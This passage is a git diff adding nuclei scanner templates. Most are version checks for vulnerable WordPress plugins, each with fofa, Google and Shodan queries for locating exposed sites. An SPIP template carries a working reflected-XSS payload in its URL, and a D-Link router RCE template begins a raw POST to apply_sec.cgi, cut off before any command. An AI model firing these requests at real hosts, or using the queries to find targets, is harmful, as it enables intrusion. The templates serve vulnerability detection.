+ tags: cve,wordpress,wp-plugin,addon-elements-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/addon-elements-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "addon-elements-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.13.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8915.yaml b/poc/cve/CVE-2024-8915.yaml new file mode 100644 index 0000000000..5a8576c819 --- /dev/null +++ b/poc/cve/CVE-2024-8915.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8915 + +info: + name: > + Category Icon <= 1.0.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Category Icon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1dc4acdc-754f-4ee0-947d-ff0c277e8181?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8915 + metadata: + fofa-query: "wp-content/plugins/category-icon/" + google-query: inurl:"/wp-content/plugins/category-icon/" + shodan-query: 'vuln:CVE-2024-8915' + tags: cve,wordpress,wp-plugin,category-icon,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/category-icon/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "category-icon" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9047.yaml b/poc/cve/CVE-2024-9047.yaml new file mode 100644 index 0000000000..297e8b8f39 --- /dev/null +++ b/poc/cve/CVE-2024-9047.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9047 + +info: + name: > + WordPress File Upload <= 4.24.11 - Unauthenticated Path Traversal to Arbitrary File Read and Deletion in wfu_file_downloader.php + author: topscoder + severity: critical + description: > + The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/554a314c-9e8e-4691-9792-d086790ef40f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9047 + metadata: + fofa-query: "wp-content/plugins/wp-file-upload/" + google-query: inurl:"/wp-content/plugins/wp-file-upload/" + shodan-query: 'vuln:CVE-2024-9047' + tags: cve,wordpress,wp-plugin,wp-file-upload,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-file-upload/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-file-upload" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.24.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9187.yaml b/poc/cve/CVE-2024-9187.yaml new file mode 100644 index 0000000000..4dec4249b1 --- /dev/null +++ b/poc/cve/CVE-2024-9187.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9187 + +info: + name: > + Read more By Adam <= 1.1.8 - Missing Authorization to Authenticated (Subscriber+) Read More Button Deletion + author: topscoder + severity: low + description: > + The Read more By Adam plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the deleteRm() function in all versions up to, and including, 1.1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete read more buttons. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ebc8d0d-04b6-49a0-96c1-7c6d930009d8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-9187 + metadata: + fofa-query: "wp-content/plugins/read-more/" + google-query: inurl:"/wp-content/plugins/read-more/" + shodan-query: 'vuln:CVE-2024-9187' + tags: cve,wordpress,wp-plugin,read-more,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/read-more/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "read-more" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9592.yaml b/poc/cve/CVE-2024-9592.yaml new file mode 100644 index 0000000000..3e025e59b3 --- /dev/null +++ b/poc/cve/CVE-2024-9592.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9592 + +info: + name: > + Easy PayPal Gift Certificate <= 1.2.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via wpppgc_plugin_options + author: topscoder + severity: medium + description: > + The Easy PayPal Gift Certificate plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the 'wpppgc_plugin_options' function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72880e44-b0e0-47f4-82f0-c36c81091ba8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9592 + metadata: + fofa-query: "wp-content/plugins/paypal-gift-certificate/" + google-query: inurl:"/wp-content/plugins/paypal-gift-certificate/" + shodan-query: 'vuln:CVE-2024-9592' + tags: cve,wordpress,wp-plugin,paypal-gift-certificate,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/paypal-gift-certificate/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "paypal-gift-certificate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9595.yaml b/poc/cve/CVE-2024-9595.yaml new file mode 100644 index 0000000000..18fe14bc4f --- /dev/null +++ b/poc/cve/CVE-2024-9595.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9595 + +info: + name: > + TablePress <= 2.4.2 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The TablePress – Tables in WordPress made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the table cell content in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffa3b85c-7d08-4f6a-889e-b75620f72a1a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9595 + metadata: + fofa-query: "wp-content/plugins/tablepress/" + google-query: inurl:"/wp-content/plugins/tablepress/" + shodan-query: 'vuln:CVE-2024-9595' + tags: cve,wordpress,wp-plugin,tablepress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tablepress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9656.yaml b/poc/cve/CVE-2024-9656.yaml new file mode 100644 index 0000000000..eb04457153 --- /dev/null +++ b/poc/cve/CVE-2024-9656.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9656 + +info: + name: > + Mynx Page Builder <= 0.27.8 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Mynx Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.27.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a25208-81fe-4337-a344-1c129bd80862?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9656 + metadata: + fofa-query: "wp-content/plugins/mynx-page-builder/" + google-query: inurl:"/wp-content/plugins/mynx-page-builder/" + shodan-query: 'vuln:CVE-2024-9656' + tags: cve,wordpress,wp-plugin,mynx-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mynx-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mynx-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.27.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9670.yaml b/poc/cve/CVE-2024-9670.yaml new file mode 100644 index 0000000000..20ecdfa0cf --- /dev/null +++ b/poc/cve/CVE-2024-9670.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9670 + +info: + name: > + 2D Tag Cloud <= 6.0.2 - Reflected Cross-Site Scripting via add_query_arg Parameter + author: topscoder + severity: medium + description: > + The 2D Tag Cloud plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 6.0.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dad1be5-ea6c-40fa-bb21-862e7fd8804a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9670 + metadata: + fofa-query: "wp-content/plugins/2d-tag-cloud-widget-by-sujin/" + google-query: inurl:"/wp-content/plugins/2d-tag-cloud-widget-by-sujin/" + shodan-query: 'vuln:CVE-2024-9670' + tags: cve,wordpress,wp-plugin,2d-tag-cloud-widget-by-sujin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/2d-tag-cloud-widget-by-sujin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "2d-tag-cloud-widget-by-sujin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9696.yaml b/poc/cve/CVE-2024-9696.yaml new file mode 100644 index 0000000000..44be74f3f0 --- /dev/null +++ b/poc/cve/CVE-2024-9696.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9696 + +info: + name: > + Rescue Shortcodes <= 2.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + The Rescue Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rescue_tab' shortcode in all versions up to, and including, 2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9517db1f-1704-4f25-9b02-795da3c4c067?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9696 + metadata: + fofa-query: "wp-content/plugins/rescue-shortcodes/" + google-query: inurl:"/wp-content/plugins/rescue-shortcodes/" + shodan-query: 'vuln:CVE-2024-9696' + tags: cve,wordpress,wp-plugin,rescue-shortcodes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rescue-shortcodes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rescue-shortcodes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9704.yaml b/poc/cve/CVE-2024-9704.yaml new file mode 100644 index 0000000000..04083f502c --- /dev/null +++ b/poc/cve/CVE-2024-9704.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9704 + +info: + name: > + Social Sharing (by Danny) <= 1.3.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + The Social Sharing (by Danny) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dvk_social_sharing' shortcode in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/619ca4b6-95bb-4c87-b8db-78e6d6b79384?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9704 + metadata: + fofa-query: "wp-content/plugins/dvk-social-sharing/" + google-query: inurl:"/wp-content/plugins/dvk-social-sharing/" + shodan-query: 'vuln:CVE-2024-9704' + tags: cve,wordpress,wp-plugin,dvk-social-sharing,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/dvk-social-sharing/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "dvk-social-sharing" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9756.yaml b/poc/cve/CVE-2024-9756.yaml new file mode 100644 index 0000000000..1a704b1c66 --- /dev/null +++ b/poc/cve/CVE-2024-9756.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9756 + +info: + name: > + Order Attachments for WooCommerce 2.0 - 2.4.1 - Missing Authorization to Authenticated (Subscriber+) Limited Arbitrary File Upload + author: topscoder + severity: low + description: > + The Order Attachments for WooCommerce plugin for WordPress is vulnerable to unauthorized limited arbitrary file uploads due to a missing capability check on the wcoa_add_attachment AJAX action in versions 2.0 to 2.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload limited file types. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0dfc8957-78b8-4c55-ba95-52d95b086341?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-9756 + metadata: + fofa-query: "wp-content/plugins/order-attachments-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/order-attachments-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-9756' + tags: cve,wordpress,wp-plugin,order-attachments-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/order-attachments-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "order-attachments-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 2.0', '<= 2.4.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9776.yaml b/poc/cve/CVE-2024-9776.yaml new file mode 100644 index 0000000000..6865c41934 --- /dev/null +++ b/poc/cve/CVE-2024-9776.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9776 + +info: + name: > + ImagePress - Image Gallery <= 1.2.2 - Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings + author: topscoder + severity: low + description: > + The ImagePress – Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/655c08e6-4ef2-438e-b381-1bc3748c3771?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-9776 + metadata: + fofa-query: "wp-content/plugins/image-gallery/" + google-query: inurl:"/wp-content/plugins/image-gallery/" + shodan-query: 'vuln:CVE-2024-9776' + tags: cve,wordpress,wp-plugin,image-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/image-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "image-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9778.yaml b/poc/cve/CVE-2024-9778.yaml new file mode 100644 index 0000000000..0ef4a189af --- /dev/null +++ b/poc/cve/CVE-2024-9778.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9778 + +info: + name: > + ImagePress – Image Gallery <= 1.2.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + The ImagePress – Image Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on the 'imagepress_admin_page' function. This makes it possible for unauthenticated attackers to update plugin settings, including redirection URLs, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/200b3446-6107-434b-b46d-2078461f3f94?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-9778 + metadata: + fofa-query: "wp-content/plugins/image-gallery/" + google-query: inurl:"/wp-content/plugins/image-gallery/" + shodan-query: 'vuln:CVE-2024-9778' + tags: cve,wordpress,wp-plugin,image-gallery,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/image-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "image-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9821.yaml b/poc/cve/CVE-2024-9821.yaml new file mode 100644 index 0000000000..ff9282d9e1 --- /dev/null +++ b/poc/cve/CVE-2024-9821.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9821 + +info: + name: > + Bot for Telegram on WooCommerce <= 1.2.4 - Authenticated (Subscriber+) Telegram Bot Token Disclosure to Authentication Bypass + author: topscoder + severity: low + description: > + The Bot for Telegram on WooCommerce plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'stm_wpcfto_get_settings' AJAX action in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to view the Telegram Bot Token, a secret token used to control the bot, which can then be used to log in as any existing user on the site, such as an administrator, if they know the username, due to the Login with Telegram feature. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a662c904-ba2e-494c-a603-b22eeeddf43d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-9821 + metadata: + fofa-query: "wp-content/plugins/bot-for-telegram-on-woocommerce/" + google-query: inurl:"/wp-content/plugins/bot-for-telegram-on-woocommerce/" + shodan-query: 'vuln:CVE-2024-9821' + tags: cve,wordpress,wp-plugin,bot-for-telegram-on-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bot-for-telegram-on-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bot-for-telegram-on-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9824.yaml b/poc/cve/CVE-2024-9824.yaml new file mode 100644 index 0000000000..ff9f9760f4 --- /dev/null +++ b/poc/cve/CVE-2024-9824.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9824 + +info: + name: > + ImagePress - Image Gallery <= 1.2.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Deletion and Post Title Update + author: topscoder + severity: low + description: > + The ImagePress – Image Gallery plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'ip_delete_post' and 'ip_update_post_title' functions in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts and update post titles. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bce6872-34d4-4675-bce9-e1197d801bce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-9824 + metadata: + fofa-query: "wp-content/plugins/image-gallery/" + google-query: inurl:"/wp-content/plugins/image-gallery/" + shodan-query: 'vuln:CVE-2024-9824' + tags: cve,wordpress,wp-plugin,image-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/image-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "image-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9860.yaml b/poc/cve/CVE-2024-9860.yaml new file mode 100644 index 0000000000..2a33e0c9b9 --- /dev/null +++ b/poc/cve/CVE-2024-9860.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9860 + +info: + name: > + Bridge Core <= 3.3 - Missing Authorization to Authenticated (Subscriber+) Demo Import + author: topscoder + severity: low + description: > + The Bridge Core plugin for WordPress is vulnerable to unauthorized modification of data or loss of data due to a missing capability check on the 'import_action' and 'install_plugin_per_demo' functions in versions up to, and including, 3.3. This makes it possible for authenticated attackers with subscriber-level permissions or above, to delete or change plugin settings, import demo data, and install limited plugins. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/968d5d31-2592-4bed-9d18-5877f0d6062e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L + cvss-score: 6.5 + cve-id: CVE-2024-9860 + metadata: + fofa-query: "wp-content/plugins/bridge-core/" + google-query: inurl:"/wp-content/plugins/bridge-core/" + shodan-query: 'vuln:CVE-2024-9860' + tags: cve,wordpress,wp-plugin,bridge-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bridge-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bridge-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/cve/cve-2016-7981-2814.yaml b/poc/cve/cve-2016-7981-2814.yaml index 40ea14c933..a15b21c00b 100644 --- a/poc/cve/cve-2016-7981-2814.yaml +++ b/poc/cve/cve-2016-7981-2814.yaml @@ -1,4 +1,5 @@ id: CVE-2016-7981 + info: name: SPIP 3.1.2 XSS author: pikpikcu @@ -12,19 +13,23 @@ info: cvss-score: 6.10 cve-id: CVE-2016-7981 cwe-id: CWE-79 + requests: - method: GET path: - "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and matchers: - type: word words: - '">' part: body + - type: status status: - 200 + - type: word part: header words: diff --git a/poc/cve/cve-2019-16920.yaml b/poc/cve/cve-2019-16920.yaml new file mode 100644 index 0000000000..d15e9704d0 --- /dev/null +++ b/poc/cve/cve-2019-16920.yaml @@ -0,0 +1,59 @@ +id: CVE-2019-16920 + +info: + name: Unauthenticated Multiple D-Link Routers RCE + author: dwisiswant0 + severity: critical + description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. + + # References: + # - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Connection: close + Referer: http://{{Hostname}}/ + Upgrade-Insecure-Requests: 1 + 